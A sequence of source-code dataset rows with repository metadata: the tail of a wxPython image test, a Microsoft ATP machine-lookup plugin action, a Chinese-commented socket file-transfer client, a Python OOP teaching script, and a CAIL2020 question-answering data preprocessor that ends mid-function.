self.assertEqual(rgb.blue, 3)
rgb.red = 4
rgb.green = 5
rgb.blue = 6
hsv = wx.Image.HSVValue(1.1, 1.2, 1.3)
self.assertEqual(hsv.hue, 1.1)
self.assertEqual(hsv.saturation, 1.2)
self.assertEqual(hsv.value, 1.3)
hsv.hue = 2.1
hsv.saturation = 2.2
hsv.value = 2.3
def test_imageRGBHSV(self):
rgb = wx.Image.RGBValue(1,2,3)
hsv = wx.Image.RGBtoHSV(rgb)
rgb = wx.Image.HSVtoRGB(hsv)
self.assertEqual(rgb.red, 1)
self.assertEqual(rgb.green, 2)
self.assertEqual(rgb.blue, 3)
def test_imageProperties(self):
img = wx.Image(pngFile)
self.assertTrue(img.IsOk())
img.Width
img.Height
img.MaskRed
img.MaskGreen
img.MaskBlue
img.Type
def test_imageMethodChain(self):
img = wx.Image(100,100).Rescale(75,75).Resize((100,100), (0,0), 40,60,80)
self.assertTrue(img.IsOk())
def test_imageOtherStuff(self):
img = wx.Image(pngFile)
self.assertTrue(img.IsOk())
r, g, b = img.FindFirstUnusedColour()
r, g, b = img.GetOrFindMaskColour()
#---------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
656dc7e15b78455cee914cb74a92048e94167263 | 9d64a438cdfe4f3feb54f2f0dc7431139c4b9fb9 | /microsoft_atp/komand_microsoft_atp/actions/get_machine_information/action.py | 1d683811c0eb693aaf72cbf02b4acadd6d9b841d | [
"MIT"
] | permissive | PhilippBehmer/insightconnect-plugins | 5ad86faaccc86f2f4ed98f7e5d518e74dddb7b91 | 9195ddffc575bbca758180473d2eb392e7db517c | refs/heads/master | 2021-07-25T02:13:08.184301 | 2021-01-19T22:51:35 | 2021-01-19T22:51:35 | 239,746,770 | 0 | 0 | MIT | 2020-02-11T11:34:52 | 2020-02-11T11:34:51 | null | UTF-8 | Python | false | false | 955 | py | import insightconnect_plugin_runtime
from .schema import GetMachineInformationInput, GetMachineInformationOutput, Input, Output, Component
# Custom imports below
class GetMachineInformation(insightconnect_plugin_runtime.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='get_machine_information',
description=Component.DESCRIPTION,
input=GetMachineInformationInput(),
output=GetMachineInformationOutput())
def run(self, params={}):
self.logger.info("Running...")
machine_id = self.connection.client.find_first_machine(params.get(Input.MACHINE)).get("id")
self.logger.info(f"Attempting to get information for machine ID: {machine_id}")
return {
Output.MACHINE: insightconnect_plugin_runtime.helper.clean(
self.connection.client.get_machine_information(machine_id)
)
}
| [
"[email protected]"
] | |
22ab57b357e0f71a237346053a156a4c9b1a6648 | 0cbc02dd7d1efbe61de04dcf1c6eccb6496bf074 | /month02/day10_IO并发/test/test02.py | b855c217d0302b1d40a8a9fe16af35d0418e9f28 | [] | no_license | fsym-fs/Python_AID | 0b1755c15e20b214940041e81bedb2d5ec99e3f9 | f806bb02cdb1670cfbea6e57846abddf3972b73b | refs/heads/master | 2021-03-20T06:57:45.441245 | 2020-05-27T14:13:45 | 2020-05-27T14:13:45 | 247,187,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,359 | py | import socket
import os
import time
class MySocket:
ADDR = ("127.0.0.1", 23456)
def __init__(self):
self.__socketfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.__socketfd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
# 连接服务端
try:
self.__socketfd.connect(self.ADDR)
except:
print("连接服务端出错!")
@property
def socketfd(self):
return self.__socketfd
class ClientController:
def __init__(self, c_socket, name="", file="", id=0):
self.id = id
self.name = name
self.file = file
self.socketfd = c_socket.socketfd
def register(self, name, pwd):
"""
用户注册请求
Args:
name: 用户名
pwd: 密码
Returns:注册结果:None 或者 (regist_status,msg)
"""
data = "R " + name + " " + pwd
self.socketfd.send(data.encode())
data = self.socketfd.recv(1024)
return ClientController.format_data_from_server(data)
def login(self, name, pwd):
"""
用户登录
Args:
name: 用户名
pwd: 密码
Returns:登录结果:None 或者(login_status,msg)
"""
data = "L " + name + " " + pwd
self.socketfd.send(data.encode())
data = ClientController.format_data_from_server(self.socketfd.recv(1024))
# 客户端信息更新 start
if data and data[0]:
self.name = name
self.pwd = pwd
self.id = data[1]
self.file = "./" + self.name
ClientController.make_dir(self.file)
data[1] = "登录成功"
# 客户端信息更新 end
return data
def quit(self):
"""
退出登录
Returns:None 或者 [True/False,msg]
"""
self.socketfd.send(b"Q")
data = ClientController.format_data_from_server(self.socketfd.recv(1024))
if data and data[0]:
self.socketfd.close()
return data
def find_file(self):
"""
查看服务器上的文件
Returns:None 或者[True/False,msg]
"""
data = "F"
self.socketfd.send(data.encode())
data = self.socketfd.recv(1024)
return ClientController.format_data_from_server(data)
def download_file(self, file_name, show_progress):
"""
从服务器下载指定文件
Args:
file_name: 服务器上待下载的文件名
show_progress: 打印下载进度
Returns:下载结果=>None 或者 [True/False,msg]
"""
if not file_name:
return [False, "文件名不能为空"]
dir = self.file + "/" + file_name
# 请求下载
data = "D " + file_name
self.socketfd.send(data.encode())
# 允许下载
data = ClientController.format_data_from_server(self.socketfd.recv(128))
if data and data[0]:
# 文件夹是否存在
ClientController.make_dir(self.file)
# 下载新文件
with open(dir, "wb") as new_file:
while True:
data = self.socketfd.recv(1024)
if not data:
return [False, "异常终止"]
elif data == b"FAIL":
return [False, "无该文件"]
elif data == b"FINISH":
show_progress([True, dir + ":下载完成"])
return [True, dir + ":下载完成"]
else:
new_file.write(data)
new_file.flush()
show_progress([True, dir + ":下载中..."])
def upload_file(self, file, show_progress):
"""
本地文件上传到服务器
Args:
file: 待上传的本地文件的路径
show_progress: 打印上传进度
Returns:上传结果=>None 或者 [True/False,msg]
"""
if not file:
return [False, "待上传文件的路径不能为空"]
if not os.path.exists(file):
return [False, file + ":不存在,无法上传!"]
# 请求上传文件
self.socketfd.send(b"U " + file.split("/")[-1].encode())
data = ClientController.format_data_from_server(self.socketfd.recv(128))
#连续发送消息,注意通过消息边界或者sleep处理粘包
time.sleep(0.1)
# 允许上传文件
if data and data[0]:
with open(file, "rb") as f:
while True:
data = f.read(1024)
if not data:
time.sleep(0.1)
self.socketfd.send(b"FINISH")
show_progress([True, file + ":上传完成"])
return [True, file + ":上传完成"]
else:
self.socketfd.send(data)
show_progress([True, file + ":上传中..."])
@staticmethod
def make_dir(name):
if not name: return None
dir = "./" + name
if os.path.exists(dir): return None
os.mkdir("./" + name)
@staticmethod
def format_data_from_server(data):
"""
格式化服务器发来的数据
Args:
data: 服务器响应的数据
Returns:若文件字节流则返回本身;若普通响应格式(xxx_status,msg),则返回(True/False,status)
"""
if not data:
return data
try:
result = data.decode()
except:
result = None
else:
result=result.split(" ",1)
if result and result[0] in "OK FAIL":
return [True if result[0] == "OK" else False, "" if len(result)<2 else result[1]]
else:
return data
class ClientView:
def __init__(self):
self.__init_view()
def __init_view(self):
self.my_socket = MySocket()
self.client_mgr = ClientController(self.my_socket)
def __register(self):
"""用户注册"""
name = pwd = repwd = ""
while not name:
name = input("请输入帐号名:")
while not pwd or not repwd or pwd != repwd:
pwd = input("请输入帐号密码:")
repwd = input("请再次输入帐号密码:")
if pwd != pwd:
print("两次密码不一致,请重新输入")
data = self.client_mgr.register(name, pwd)
if data:
print(data[1])
def __login(self):
"""用户登录"""
name = pwd = ""
while not name:
name = input("请输入帐号名:")
while not pwd:
pwd = input("请输入帐号密码:")
data = self.client_mgr.login(name, pwd)
if data:
print(data[1])
if data[0]:
self.__display_menu()
def __quit(self):
"""退出"""
data = self.client_mgr.quit()
if data:
print(data[-1])
return data[0]
def __find_file(self):
"""查看文件"""
data = self.client_mgr.find_file()
if data:
print(data[1])
def __download_file(self):
"""下载文件"""
file_name = input("请输入需要下载的文件(例如:xxx.txt): ")
data = self.client_mgr.download_file(file_name, self.__show_progress)
if data and not data[0]:
print(data[1])
def __upload_file(self):
"""用户登录"""
file_name = input("请输入待上传文件的路径:")
data = self.client_mgr.upload_file(file_name, self.__show_progress)
if data and not data[0]:
print(data[1])
def __show_progress(self, data):
"""打印进度"""
if data and data[0]:
print(data[1])
@staticmethod
def input_number(tip):
"""
工具:输入数字
Args:
tip:
Returns:
"""
while True:
try:
num = int(input(tip))
except:
continue
return num
def main(self):
"""登录/注册"""
while True:
print("1)注册")
print("2)登录")
print("3)关闭")
index = ClientView.input_number("请输入选项数字:")
if index == 1:
self.__register()
elif index == 2:
self.__login()
elif index == 3:
break
def __display_menu(self):
while True:
print("1)查看文件")
print("2)下载文件")
print("3)上传文件")
print("4)退出登陆")
index = ClientView.input_number("请输入选项数字:")
if index == 1:
self.__find_file()
elif index == 2:
self.__download_file()
elif index == 3:
self.__upload_file()
elif index == 4:
if self.__quit():
self.__init_view()
break
if __name__ == '__main__':
ftp_client_view = ClientView()
ftp_client_view.main() | [
"[email protected]"
] | |
5cd8e84f11d2ea34f343ae402d5c0b33dcf7d2db | 958d87cc3b77bb3308d0aa04b92fdef5f97d63ae | /4.OOPS/InheritanceAndPolymorphism.py | 8056a618b0d68087183a3df5858998b9bc487e65 | [] | no_license | parihar08/PythonJosePortilla | 6dec83519af78451c46e323928aedf19dbd908f1 | 6f47291908ad05daf5a505ba0e13687c46651bc2 | refs/heads/master | 2022-12-19T07:30:39.603468 | 2020-09-19T14:56:36 | 2020-09-19T14:56:36 | 292,650,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,005 | py | class Animal():
def __init__(self):
print('ANIMAL CREATED')
def who_am_i(self):
print("I am an animal")
def eat(self):
print("I am eating")
# myanimal = Animal()
# myanimal.who_am_i()
# myanimal.who_am_i()
class Dog(Animal):
def __init__(self):
Animal.__init__(self) #Create instance of Animal class when we create instance of Dog class
print('DOG CREATED')
#METHOD OVERRIDE
def who_am_i(self):
print("I am a Dog")
#ADDITIONAL METHODS
def bark(self):
print('WOOF!')
mydog = Dog()
print('*********************************************')
mydog.who_am_i()
mydog.bark()
mydog.eat()
print('*******************POLYMORPHISM**************************')
#Different object classes can share the same method name
class Dog1():
def __init__(self,name):
self.name = name
def speak(self):
return self.name + " says WOOF!"
class Cat1():
def __init__(self,name):
self.name = name
def speak(self):
return self.name + " says MEOW!"
niko = Dog1('niko')
felix = Cat1('felix')
print(niko.speak())
print(felix.speak())
print('*********************************************')
#Here both Dog1 and Cat1 class has speak() method
for pet in [niko,felix]:
print(type(pet))
print(pet.speak())
print('*********************************************')
def pet_speak(pet):
print(pet.speak())
pet_speak(niko)
pet_speak(felix)
print('*******************ABSTRACT CLASSES & INHERITANCE**************************')
class Animal2():
def __init__(self,name):
self.name = name
def speak(self):
raise NotImplementedError('SubClass must implement this abstract method!!')
#myanimal = Animal2('fred')
class Dog2(Animal2):
def speak(self):
return self.name + " says WOOF!"
class Cat2(Animal2):
def speak(self):
return self.name + " says MEOW!"
fido = Dog2('Fido')
isis = Cat2('Isis')
print(fido.speak())
print(isis.speak())
| [
"[email protected]"
] | |
3d31f9d19bdc8592287891bd2f4f8425acbdbd17 | 7ce2b2000cfefe8fbefc2271ebc7df2061c88194 | /CAIL2020/ydljz(hong)/data.py | 9e4c92f039a17554e02061223f80e2403193f7fd | [
"Apache-2.0"
] | permissive | generalzgd/CAIL | f06d79acf42ac2188938c02087f7d07b9b43095c | 57529e64ee2f602324a500ff9bed660ddcde10bb | refs/heads/master | 2023-01-24T01:14:05.382525 | 2020-11-20T03:40:47 | 2020-11-20T03:40:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,128 | py | """Data processor for SMP-CAIL2020-Argmine.
Author: Yixu GAO ([email protected])
In data file, each line contains 1 sc sentence and 5 bc sentences.
The data processor convert each line into 5 samples,
each sample with 1 sc sentence and 1 bc sentence.
Usage:
1. Tokenizer (used for RNN model):
from data import Tokenizer
vocab_file = 'vocab.txt'
sentence = '我饿了,想吃东西了。'
tokenizer = Tokenizer(vocab_file)
tokens = tokenizer.tokenize(sentence)
# ['我', '饿', '了', ',', '想', '吃', '东西', '了', '。']
ids = tokenizer.convert_tokens_to_ids(tokens)
2. Data:
from data import Data
# For training, load train and valid set
# For BERT model
data = Data('model/bert/vocab.txt', model_type='bert')
datasets = data.load_train_and_valid_files(
'SMP-CAIL2020-train.csv', 'SMP-CAIL2020-valid.csv')
train_set, valid_set_train, valid_set_valid = datasets
# For RNN model
data = Data('model/rnn/vocab.txt', model_type='rnn')
datasets = data.load_all_files(
'SMP-CAIL2020-train.csv', 'SMP-CAIL2020-valid.csv')
train_set, valid_set_train, valid_set_valid = datasets
# For testing, load test set
data = Data('model/bert/vocab.txt', model_type='bert')
test_set = data.load_file('SMP-CAIL2020-test.csv', train=False)
"""
import json
from typing import List
import jieba
import torch
import pandas as pd
from torch.utils.data import TensorDataset
from transformers import BertTokenizer
# from pytorch_pretrained_bert import BertTokenizer
from tqdm import tqdm
max_support_sents = 45
class Tokenizer:
"""Tokenizer for Chinese given vocab.txt.
Attributes:
dictionary: Dict[str, int], {<word>: <index>}
"""
def __init__(self, vocab_file='vocab.txt'):
"""Initialize and build dictionary.
Args:
vocab_file: one word each line
"""
self.dictionary = {'[PAD]': 0, '[UNK]': 1}
count = 2
with open(vocab_file, encoding='utf-8') as fin:
for line in fin:
word = line.strip()
self.dictionary[word] = count
count += 1
def __len__(self):
return len(self.dictionary)
@staticmethod
def tokenize(sentence: str) -> List[str]:
"""Cut words for a sentence.
Args:
sentence: sentence
Returns:
words list
"""
return jieba.lcut(sentence)
def convert_tokens_to_ids(
self, tokens_list: List[str]) -> List[int]:
"""Convert tokens to ids.
Args:
tokens_list: word list
Returns:
index list
"""
return [self.dictionary.get(w, 1) for w in tokens_list]
class Example(object):
def __init__(self,
qas_id,
qas_type,
doc_tokens,
question_text,
sent_num,
sent_names,
sup_fact_id,
para_start_end_position,
sent_start_end_position,
entity_start_end_position,
orig_answer_text=None,
start_position=None,
end_position=None):
self.qas_id = qas_id
self.qas_type = qas_type
self.doc_tokens = doc_tokens
self.question_text = question_text
self.sent_num = sent_num
self.sent_names = sent_names
self.sup_fact_id = sup_fact_id
self.para_start_end_position = para_start_end_position
self.sent_start_end_position = sent_start_end_position
self.entity_start_end_position = entity_start_end_position
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self,
qas_id,
doc_tokens,
doc_input_ids,
doc_input_mask,
doc_segment_ids,
query_tokens,
query_input_ids,
query_input_mask,
query_segment_ids,
sent_spans,
sup_fact_ids,
ans_type,
token_to_orig_map,
start_position=None,
end_position=None):
self.qas_id = qas_id
self.doc_tokens = doc_tokens
self.doc_input_ids = doc_input_ids
self.doc_input_mask = doc_input_mask
self.doc_segment_ids = doc_segment_ids
self.query_tokens = query_tokens
self.query_input_ids = query_input_ids
self.query_input_mask = query_input_mask
self.query_segment_ids = query_segment_ids
self.sent_spans = sent_spans
self.sup_fact_ids = sup_fact_ids
self.ans_type = ans_type
self.token_to_orig_map=token_to_orig_map
self.start_position = start_position
self.end_position = end_position
def get_valid_spans(spans, limit):
new_spans = []
for span in spans:
if span[1] < limit:
new_spans.append(span)
else:
new_span = list(span)
new_span[1] = limit - 1
new_spans.append(tuple(new_span))
break
return new_spans
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return new_start, new_end
return input_start, input_end
class Data:
"""Data processor for BERT and RNN model for SMP-CAIL2020-Argmine.
Attributes:
model_type: 'bert' or 'rnn'
max_seq_len: int, default: 512
tokenizer: BertTokenizer for bert
Tokenizer for rnn
"""
def __init__(self,
vocab_file='',
max_seq_len: int = 512,
model_type: str = 'bert', config=None):
"""Initialize data processor for SMP-CAIL2020-Argmine.
Args:
vocab_file: one word each line
max_seq_len: max sequence length, default: 512
model_type: 'bert' or 'rnn'
If model_type == 'bert', use BertTokenizer as tokenizer
Otherwise, use Tokenizer as tokenizer
"""
self.model_type = model_type
if self.model_type == 'bert':
self.tokenizer = BertTokenizer.from_pretrained(config.bert_model_path)#BertTokenizer(vocab_file)
else: # rnn
self.tokenizer = Tokenizer(vocab_file)
self.max_seq_len = max_seq_len
def load_file(self,
file_path='SMP-CAIL2020-train.csv',
train=True) -> TensorDataset:
"""Load SMP-CAIL2020-Argmine train file and construct TensorDataset.
Args:
file_path: train file with last column as label
train:
If True, train file with last column as label
Otherwise, test file without last column as label
Returns:
BERT model:
Train:
torch.utils.data.TensorDataset
each record: (input_ids, input_mask, segment_ids, label)
Test:
torch.utils.data.TensorDataset
each record: (input_ids, input_mask, segment_ids)
RNN model:
Train:
torch.utils.data.TensorDataset
each record: (s1_ids, s2_ids, s1_length, s2_length, label)
Test:
torch.utils.data.TensorDataset
each record: (s1_ids, s2_ids, s1_length, s2_length)
"""
examples, features_list = self._load_file1(file_path, train)
# if self.model_type == 'bert':
dataset = self._convert_sentence_pair_to_bert_dataset(
features_list)
# else: # rnn
# dataset = self._convert_sentence_pair_to_rnn_dataset(
# sc_list, bc_list, label_list)
return examples, features_list, dataset
def load_train_and_valid_files(self, train_file, valid_file):
"""Load all files for SMP-CAIL2020-Argmine.
Args:
train_file, valid_file: files for SMP-CAIL2020-Argmine
Returns:
train_set, valid_set_train, valid_set_valid
all are torch.utils.data.TensorDataset
"""
print('Loading train records for train...')
train_exam, train_feat, train_set = self.load_file(train_file, True)
print(len(train_set), 'training records loaded.')
# print('Loading train records for valid...')
# train_exam, train_feat, valid_set_train = self.load_file(train_file, False)
# print(len(valid_set_train), 'train records loaded.')
print('Loading valid records...')
valid_exam, valid_feat, valid_set_valid = self.load_file(valid_file, False)
print(len(valid_set_valid), 'valid records loaded.')
return train_set, train_set, valid_set_valid, train_exam, valid_exam, train_feat, valid_feat
def _load_file(self, filename, train: bool = True):
"""Load SMP-CAIL2020-Argmine train/test file.
For train file,
The ratio between positive samples and negative samples is 1:4
Copy positive 3 times so that positive:negative = 1:1
Args:
filename: SMP-CAIL2020-Argmine file
train:
If True, train file with last column as label
Otherwise, test file without last column as label
Returns:
sc_list, bc_list, label_list with the same length
sc_list, bc_list: List[List[str]], list of word tokens list
label_list: List[int], list of labels
"""
data_frame = pd.read_csv(filename)
sc_list, bc_list, label_list = [], [], []
for row in data_frame.itertuples(index=False):
# candidates = row[0:2]
answer = bool(row[-1]) if train else None
sc_tokens = self.tokenizer.tokenize(row[0])
bc_tokens = self.tokenizer.tokenize(row[1])
label = 1 if answer else 0
sc_list.append(sc_tokens)
bc_list.append(bc_tokens)
if train:
label_list.append(label)
# for i, _ in enumerate(candidates):
# bc_tokens = self.tokenizer.tokenize(candidates[i])
# if train:
# if i + 1 == answer:
# # Copy positive sample 4 times
# for _ in range(len(candidates) - 1):
# sc_list.append(sc_tokens)
# bc_list.append(bc_tokens)
# label_list.append(1)
# else:
# sc_list.append(sc_tokens)
# bc_list.append(bc_tokens)
# label_list.append(0)
# else: # test
# sc_list.append(sc_tokens)
# bc_list.append(bc_tokens)
return sc_list, bc_list, label_list
def _load_file1(self, filename, train: bool = True):
with open(filename, 'r', encoding='utf-8') as reader:
full_data = json.load(reader) # 完整的原始数据
def is_whitespace(c):
if c.isspace() or ord(c) == 0x202F or ord(c) == 0x2000:
return True
return False
cnt = 0
examples = []
for case in tqdm(full_data): # 遍历每个样本
key = case['_id']
qas_type = "" # case['type']
sup_facts = set([(sp[0], sp[1]) for sp in case['supporting_facts']]) # TODO: 为啥是个集合?为了去重?
sup_titles = set([sp[0] for sp in case['supporting_facts']]) # sup para 的title 列表
orig_answer_text = case['answer']
sent_id = 0
doc_tokens = []
sent_names = []
sup_facts_sent_id = []
sent_start_end_position = []
para_start_end_position = []
entity_start_end_position = []
ans_start_position, ans_end_position = [], []
JUDGE_FLAG = orig_answer_text == 'yes' or orig_answer_text == 'no' or orig_answer_text == 'unknown' or orig_answer_text == "" # judge_flag??
FIND_FLAG = False
char_to_word_offset = [] # Accumulated along all sentences
prev_is_whitespace = True
# for debug
titles = set()
para_data = case['context']
for paragraph in para_data: # 选中的段落
title = paragraph[0]
sents = paragraph[1] # 句子列表
# ratio = (sum([len(sent) for sent in sents]) + len(case['question'])) * 1.0 / 512
# sents = [dynamic_fit_bert_size(sent, ratio) for sent in sents]
titles.add(title) # 选中的title
is_gold_para = 1 if title in sup_titles else 0 # 是否是gold para
para_start_position = len(doc_tokens) # 刚开始doc_tokens是空的
for local_sent_id, sent in enumerate(sents): # 处理段落的每个句子
if local_sent_id >= max_support_sents: # 句子数量限制:一个段落最多只允许44个句子
break
# Determine the global sent id for supporting facts
local_sent_name = (title, local_sent_id) # (title, 句子在段落中的位置)
sent_names.append(local_sent_name) # 作为句子的名字
if local_sent_name in sup_facts:
sup_facts_sent_id.append(sent_id) # TODO: 这个跟原始的sup标签有啥区别
sent_id += 1 # 这个句子的id是以整个article为范围的,为什么?
sent = " ".join(sent)
sent += " "
sent_start_word_id = len(doc_tokens) # 句子开始位置的word id
sent_start_char_id = len(char_to_word_offset) # 句子开始位置的char id
for c in sent: # 遍历整个句子的字符,建立char到word之间的映射关系
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
sent_end_word_id = len(doc_tokens) - 1 # 句子结尾的word位置
sent_start_end_position.append((sent_start_word_id, sent_end_word_id)) # 句子开始和结束的位置,以元组形式保存
# Answer char position
answer_offsets = []
offset = -1
tmp_answer = " ".join(orig_answer_text)
while True:
offset = sent.find(tmp_answer, offset + 1)
if offset != -1:
valid=False
for sup_id in sup_facts_sent_id:
start_, end_ = sent_start_end_position[sup_id]
if offset >= start_ and offset <= end_:
valid=True
if valid:
answer_offsets.append(offset) # 把所有相同答案的开始位置都找到
else:
break
# answer_offsets = [m.start() for m in re.finditer(orig_answer_text, sent)]
if not JUDGE_FLAG and not FIND_FLAG and len(answer_offsets) > 0:
FIND_FLAG = True # 标志找到了答案,TODO:这个有啥用
for answer_offset in answer_offsets:
start_char_position = sent_start_char_id + answer_offset # 答案开始的char位置
end_char_position = start_char_position + len(tmp_answer) - 1 # 答案结束的char位置
# 答案开始的token位置,每个答案都保存
ans_start_position.append(char_to_word_offset[start_char_position])
ans_end_position.append(char_to_word_offset[end_char_position])
# Truncate longer document
if len(doc_tokens) >= 460: # 如果大于382个词则break
# 这个截断会让每个段落至少有一个句子被加入,即使整个样本已经超过382,这样后面匹配entity还能匹配上吗?
break
# 问题改写
# case['question'] = dynamic_fit_bert_size(case['question'], ratio)
if len(case['question']) > 50:
case['question'] = case['question'][-50:]
para_end_position = len(doc_tokens) - 1
# 一个段落的开始和结束token位置(白空格分词)
para_start_end_position.append(
(para_start_position, para_end_position, title, is_gold_para)) # 顺便加上开始和结束位置
if len(ans_end_position) > 1:
cnt += 1 # 如果答案结束的位置大于1,cnt+1,如果答案结束位置是0呢?
if key < 10:
print("qid {}".format(key))
print("qas type {}".format(qas_type))
print("doc tokens {}".format(doc_tokens))
print("question {}".format(case['question']))
print("sent num {}".format(sent_id + 1))
print("sup face id {}".format(sup_facts_sent_id))
print("para_start_end_position {}".format(para_start_end_position))
print("sent_start_end_position {}".format(sent_start_end_position))
print("entity_start_end_position {}".format(entity_start_end_position))
print("orig_answer_text {}".format(orig_answer_text))
print("ans_start_position {}".format(ans_start_position))
print("ans_end_position {}".format(ans_end_position))
# 一个paragraph是一个example
example = Example(
qas_id=key,
qas_type=qas_type,
doc_tokens=doc_tokens,
question_text=case['question'],
sent_num=sent_id + 1,
sent_names=sent_names,
sup_fact_id=sup_facts_sent_id,
para_start_end_position=para_start_end_position, # 一个样本是一个article, 有多个段落开始和结束的位置
sent_start_end_position=sent_start_end_position,
entity_start_end_position=entity_start_end_position,
orig_answer_text=orig_answer_text,
start_position=ans_start_position, # 这里是word的开始和结束位置
end_position=ans_end_position)
examples.append(example)
features_list = self.convert_examples_to_features(examples, self.tokenizer, 512, 50)
return examples, features_list
def convert_examples_to_features(self, examples, tokenizer, max_seq_length, max_query_length):
# max_query_length = 50
features = []
failed = 0
for (example_index, example) in enumerate(tqdm(examples)): # 遍历所有的example
if example.orig_answer_text == 'yes':
ans_type = 1
elif example.orig_answer_text == 'no':
ans_type = 2
elif example.orig_answer_text == 'unknown':
ans_type = 3
else:
ans_type = 0 # 统计answer type
query_tokens = ["[CLS]"]
for token in example.question_text.split(' '):
query_tokens.extend(tokenizer.tokenize(token))
if len(query_tokens) > max_query_length - 1:
query_tokens = query_tokens[:max_query_length - 1]
query_tokens.append("[SEP]")
# para_spans = []
# entity_spans = []
sentence_spans = []
all_doc_tokens = []
orig_to_tok_index = []
orig_to_tok_back_index = []
tok_to_orig_index = [0] * len(query_tokens)
all_doc_tokens = ["[CLS]"] # 这一段不是啰嗦的代码吗
for token in example.question_text.split(' '):
all_doc_tokens.extend(tokenizer.tokenize(token))
if len(all_doc_tokens) > max_query_length - 1:
all_doc_tokens = all_doc_tokens[:max_query_length - 1]
all_doc_tokens.append("[SEP]")
for (i, token) in enumerate(example.doc_tokens): # 遍历context的所有token(白空格分割)
orig_to_tok_index.append(len(all_doc_tokens)) # 空格分词的token与wp分词后的token对应
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i) # wp 分词后的token对应的空格分词的token
all_doc_tokens.append(sub_token)
orig_to_tok_back_index.append(len(all_doc_tokens) - 1) # 这个看意思应该是原始token与wp分词后的最后一个subtoken对应?
def relocate_tok_span(orig_start_position, orig_end_position, orig_text):
# word的(在para中的)开始和结束位置
if orig_start_position is None: # 如果输入的是none,返回0,实际上不会存在这种情况
return 0, 0
tok_start_position = orig_to_tok_index[orig_start_position]
if orig_end_position < len(example.doc_tokens) - 1: # 如果结束位置没有超出了边界
tok_end_position = orig_to_tok_index[orig_end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1 # 超出边界
# Make answer span more accurate.
return _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer, orig_text)
ans_start_position, ans_end_position = [], []
for ans_start_pos, ans_end_pos in zip(example.start_position, example.end_position): # 遍历每一个答案开始和结束位置
s_pos, e_pos = relocate_tok_span(ans_start_pos, ans_end_pos, example.orig_answer_text)
ans_start_position.append(s_pos) # 这里返回的是答案在bert输入中的位置
ans_end_position.append(e_pos)
# for entity_span in example.entity_start_end_position:
# ent_start_position, ent_end_position \
# = relocate_tok_span(entity_span[0], entity_span[1], entity_span[2])
# entity_spans.append((ent_start_position, ent_end_position, entity_span[2], entity_span[3]))
# 这里找到了每个实体在bert输入中的开始和结束位置
for sent_span in example.sent_start_end_position: # 每个句子开始和结束word的id
if sent_span[0] >= len(orig_to_tok_index) or sent_span[0] >= sent_span[1]:
continue # 如果句子的开始位置大于映射表的范围,或者开始与结束位置相同(空句子),就continue
sent_start_position = orig_to_tok_index[sent_span[0]] # 句子在bert输入中的开始和结束位置
sent_end_position = orig_to_tok_back_index[
sent_span[1]] # 句子结束的sub word位置(这里就是orig_to_tok_back_index的用处)
sentence_spans.append((sent_start_position, sent_end_position)) # 句子在bert输入中的开始和结束位置
# for para_span in example.para_start_end_position:
# if para_span[0] >= len(orig_to_tok_index) or para_span[0] >= para_span[1]:
# continue
# para_start_position = orig_to_tok_index[para_span[0]]
# para_end_position = orig_to_tok_back_index[para_span[1]]
# para_spans.append((para_start_position, para_end_position, para_span[2], para_span[3])) # 3是是否是sup para
# Padding Document
all_doc_tokens = all_doc_tokens[:max_seq_length - 1] + ["[SEP]"]
doc_input_ids = tokenizer.convert_tokens_to_ids(all_doc_tokens)
query_input_ids = tokenizer.convert_tokens_to_ids(query_tokens)
doc_input_mask = [1] * len(doc_input_ids)
doc_segment_ids = [0] * len(query_input_ids) + [1] * (len(doc_input_ids) - len(query_input_ids))
while len(doc_input_ids) < max_seq_length:
doc_input_ids.append(0)
doc_input_mask.append(0)
doc_segment_ids.append(0)
# Padding Question
query_input_mask = [1] * len(query_input_ids)
query_segment_ids = [0] * len(query_input_ids)
while len(query_input_ids) < max_query_length:
query_input_ids.append(0)
query_input_mask.append(0)
query_segment_ids.append(0)
assert len(doc_input_ids) == max_seq_length
assert len(doc_input_mask) == max_seq_length
assert len(doc_segment_ids) == max_seq_length
assert len(query_input_ids) == max_query_length
assert len(query_input_mask) == max_query_length
assert len(query_segment_ids) == max_query_length
sentence_spans = get_valid_spans(sentence_spans, max_seq_length)
# para_spans = get_valid_spans(para_spans, max_seq_length)
sup_fact_ids = example.sup_fact_id
sent_num = len(sentence_spans)
sup_fact_ids = [sent_id for sent_id in sup_fact_ids if sent_id < sent_num]
if len(sup_fact_ids) != len(example.sup_fact_id):
failed += 1
if example.qas_id < 10:
print("qid {}".format(example.qas_id))
print("all_doc_tokens {}".format(all_doc_tokens))
print("doc_input_ids {}".format(doc_input_ids))
print("doc_input_mask {}".format(doc_input_mask))
print("doc_segment_ids {}".format(doc_segment_ids))
print("query_tokens {}".format(query_tokens))
print("query_input_ids {}".format(query_input_ids))
print("query_input_mask {}".format(query_input_mask))
print("query_segment_ids {}".format(query_segment_ids))
# print("para_spans {}".format(para_spans))
print("sentence_spans {}".format(sentence_spans))
# print("entity_spans {}".format(entity_spans))
print("sup_fact_ids {}".format(sup_fact_ids))
print("ans_type {}".format(ans_type))
print("tok_to_orig_index {}".format(tok_to_orig_index))
print("ans_start_position {}".format(ans_start_position))
print("ans_end_position {}".format(ans_end_position))
features.append(
InputFeatures(qas_id=example.qas_id,
doc_tokens=all_doc_tokens,
